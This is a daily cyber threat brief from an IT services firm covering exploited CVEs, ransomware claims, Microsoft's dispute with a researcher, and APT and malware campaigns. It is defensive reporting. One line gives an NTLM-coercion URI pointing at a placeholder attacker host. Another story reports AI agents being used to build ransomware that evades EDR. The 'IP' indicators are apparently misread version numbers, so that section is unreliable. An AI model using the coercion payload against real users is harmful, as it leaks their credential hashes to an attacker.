← Carolina Clear Tech

Cyber Threat Brief

2026-06-03

Listen to this brief (14:58)

Download MP3
Show Notes

Show Notes - 2026-06-03

Stories Covered

CVEs Referenced

CVE-2022-0492, CVE-2024-21182, CVE-2025-48595, CVE-2025-8088, CVE-2026-21509, CVE-2026-33825, CVE-2026-33829, CVE-2026-41091, CVE-2026-45498, CVE-2026-8206

Indicators of Compromise

IP Addresses: 12.2.1.4, 14.1.1.0

Read the full brief

Get tomorrow's brief in your inbox

Protect Your Business

Need a security assessment? See our cybersecurity packages.

View Services

Daily IT Security Brief

June 3, 2026

Today: CISA adds Oracle WebLogic CVE-2024-21182 to KEV catalog after active exploitation with federal patch deadline tomorrow. Google patches exploited Android zero-day CVE-2025-48595 used in targeted attacks. Microsoft backpedals on legal threats against zero-day researcher after security community backlash.

Critical Alerts

Oracle WebLogic CVE-2024-21182 Actively Exploited (CVE-2024-21182)

CISA added a two-year-old Oracle WebLogic Server vulnerability to its KEV catalog on June 2 after confirming active exploitation. CVE-2024-21182 (CVSS 7.5, EPSS 89.6th percentile) allows unauthenticated remote attackers to compromise WebLogic Server versions 12.2.1.4.0 and 14.1.1.0.0 via T3 or IIOP protocols, resulting in unauthorized access to all WebLogic accessible data. Over 1,500 vulnerable servers remain exposed online. Oracle patched this in July 2024.

Google Patches Exploited Android Zero-Day (CVE-2025-48595)

Google's June 2026 Android update addresses 124 vulnerabilities including actively exploited zero-day CVE-2025-48595 (CVSS 8.4). The high-severity Framework component flaw allows local privilege escalation via integer overflow with no user interaction required. Google confirmed limited, targeted exploitation. The flaw affects Android 14, 15, 16, and 16 QPR2. CISA added CVE-2025-48595 to KEV on June 2 with a June 5 remediation deadline. Commercial spyware vendors typically exploit similar Android zero-days for targeted surveillance.

Linux Kernel Privilege Escalation Added to KEV (CVE-2022-0492)

CISA added CVE-2022-0492, a Linux Kernel improper authentication vulnerability, to the KEV catalog on June 2 based on active exploitation evidence. Federal agencies must remediate by June 5.

Ransomware Claims (Last 48h)

2 claims tracked across 1 group in the last 48 hours. These are unverified claims from ransomware leak sites.

Group Victim Sector Country
Black X elektroverband-bayern Trade Association (Electrical) Germany
Black X African National Congress Political South Africa

Windows / AD Security

Unpatched NTLM Coercion in Windows Search URI Handler (No CVE)

Huntress disclosed an unpatched NTLM credential leakage vulnerability in Windows search: URI handler that leaks Net-NTLMv2 hashes via single link click. The bug uses the same mechanism as patched CVE-2026-33829 (Snipping Tool) but in a different URI handler. Microsoft closed the report as below servicing bar with no CVE or fix planned. The vulnerability works via search:query=test&crumb=location:\\attacker-ip\share and fires on first invocation per logon, including from HTML links in browsers. Defender does not alert.

General Security News

Microsoft Backtracks on Zero-Day Researcher Legal Threats

Microsoft clarified its approach to security researchers on June 1 after backlash over perceived threats of criminal prosecution against researcher Nightmare Eclipse, who publicly disclosed six unpatched Windows zero-days including BlueHammer (CVE-2026-33825), RedSun (CVE-2026-41091), and UnDefend (CVE-2026-45498). Three have been exploited in the wild. Microsoft's May 27 blog post stated its Digital Crimes Unit would "continue bringing cases against these actors and those that enable their criminal activity, coordinating as needed with law enforcement around the world," which the security community interpreted as a threat of legal action for disclosing zero-days. Microsoft's June 1 clarification stated: "We have no intention to pursue action against individuals conducting or publishing their security research. When an individual breaks the law and engages in malicious activity causing real harm to our customers, we will work with law enforcement as appropriate." The controversy stems from a disclosure dispute between Nightmare Eclipse and MSRC. Microsoft disabled the researcher's GitHub and vulnerability portal accounts.

VS Code Zero-Day Allows GitHub Token Theft via Link Click

Security researcher Ammar Askar disclosed a VS Code zero-day that allows attackers to steal GitHub OAuth tokens by tricking users into clicking malicious links. The vulnerability exploits VS Code's sandboxed webview message-passing system to install malicious extensions that extract GitHub OAuth tokens sent to github.dev. The PoC runs malicious JavaScript to simulate keypresses and install an extension that enumerates all private repositories the victim can access. Askar disclosed publicly one hour after notifying GitHub due to prior negative experience with MSRC, which previously fixed a VS Code bug he reported without credit or acknowledgment. No patch available.

AI-Built Ransomware Toolkit Automates EDR Evasion

Sophos discovered a threat actor using AI agents (Cursor and Claude Opus) to build a ransomware attack toolkit that automates Active Directory discovery and EDR evasion. The toolkit was detected in a customer environment with payloads in C:\Users\User\Documents\test. The framework includes Cobalt Strike profiles mimicking legitimate traffic, Telegram bot C2, Python shellcode injectors, and Cloudflare Worker redirectors. Multiple AI agents coordinate R&D: Claude Opus 4.5 orchestrates, while specialized agents handle testing, OPSEC hardening, VM deployment, and payload generation. Close to 80 modules in Rust and Go were generated and tested against over 70 evasion techniques targeting Sophos, CrowdStrike, and Windows Defender. Cobalt Strike logs revealed ransom notes and references to multiple organizations on ransomware leak sites, confirming criminal use despite red team appearance.

DriveSurge Campaign Hijacks Thousands of Sites for Malware Delivery

Silent Push disclosed DriveSurge, a large-scale initial access broker operation using compromised legitimate websites to deliver ClickFix and FakeUpdate malware via a traffic distribution system (zTDS). The campaign compromised thousands of high-reputation websites since at least September 2025 and remained undetected until February 2026. Attackers inject malicious code that redirects visitors through zTDS, which profiles the victim and serves FakeUpdate browser prompts or ClickFix attacks. The infrastructure includes payload repositories, PowerShell downloaders, staging servers, and failover domains with Base64-encoded JavaScript obfuscation. DriveSurge targets both Windows and macOS. The operation functions as a pay-per-install service selling initial access to downstream threat actors.

Exchange Online Outage Causes Email Delays and Failures

Microsoft addressed a widespread Exchange Online outage (EX1331830) on June 2 affecting mail flow across North America, APAC, and Europe. Users experienced significant send and receive delays (over one hour), SMTP deferral errors ("maximum number of concurrent connections per resource forest has exceeded a limit"), and connection closures. Microsoft classified this as an incident due to critical impact. The company resolved similar Exchange Online issues in April and May affecting mailbox access and calendar functionality.

Ransomware & Extortion

Gamaredon Exploits WinRAR to Deliver Malware Against Ukraine

Russian state-sponsored group Gamaredon (FSB-linked) continues exploiting WinRAR vulnerability CVE-2025-8088 to deliver GammaPhish, GammaLoad, GammaWorm, and GammaSteel malware families targeting Ukraine. The January 2026 campaign uses booby-trapped RAR archives delivered via spear-phishing. GammaWorm establishes persistence via scheduled tasks, hides legitimate directories on network shares and USB drives, and replaces them with malicious LNK files. C2 resolution uses hard-coded public Telegram channels to blend with legitimate traffic. GammaSteel is a modular information stealer that exfiltrates files matching specific extensions to AWS S3 buckets or attacker servers. NTFS Alternate Data Streams conceal core modules. The infection chain reveals a resilient, modular design that will be reused in future campaigns.

Patch Priority

Vulnerability Disclosures

WordPress Kirki Plugin Privilege Escalation Exploited (CVE-2026-8206)

Hackers are exploiting critical privilege escalation flaw CVE-2026-8206 in WordPress plugin Kirki (Freeform Page Builder). Wordfence blocked over 222 attacks in 24 hours. The vulnerability affects versions 6.0.0 through 6.0.6 (40% of plugin's 500,000+ installations). The flaw exposes a REST API endpoint for password resets via handle_forgot_password() function that accepts arbitrary email addresses. When a username is provided, the plugin generates a valid password reset link but sends it to the attacker-supplied email rather than the account owner's registered email. Unauthenticated attackers can trivially hijack any user account including administrators. Patched in version 6.0.7 released May 18.

Microsoft Office Vulnerability (CVE-2026-21509) Used by APT28

ExaTrack reports APT28 continues exploiting Microsoft Office vulnerability CVE-2026-21509 (CISA KEV, due February 16) to deliver COVENANT Grunt implant via PixyNetLoader malware. The loader has been active since December 2024 with recent samples from April 15, 2026. CVE-2026-21509 has EPSS 13.9th percentile and CISA KEV status.

Trends & Context

Three major themes dominate today: vendor disclosure conflicts are escalating with Microsoft facing community backlash over legal threats against researchers, critical infrastructure vulnerabilities remain unpatched years after disclosure (Oracle WebLogic, Linux Kernel), and AI-assisted malware development is now operational at scale for ransomware operations. The gap between vulnerability disclosure and exploitation continues to shrink, with multiple 2024 and 2025 CVEs under active attack today.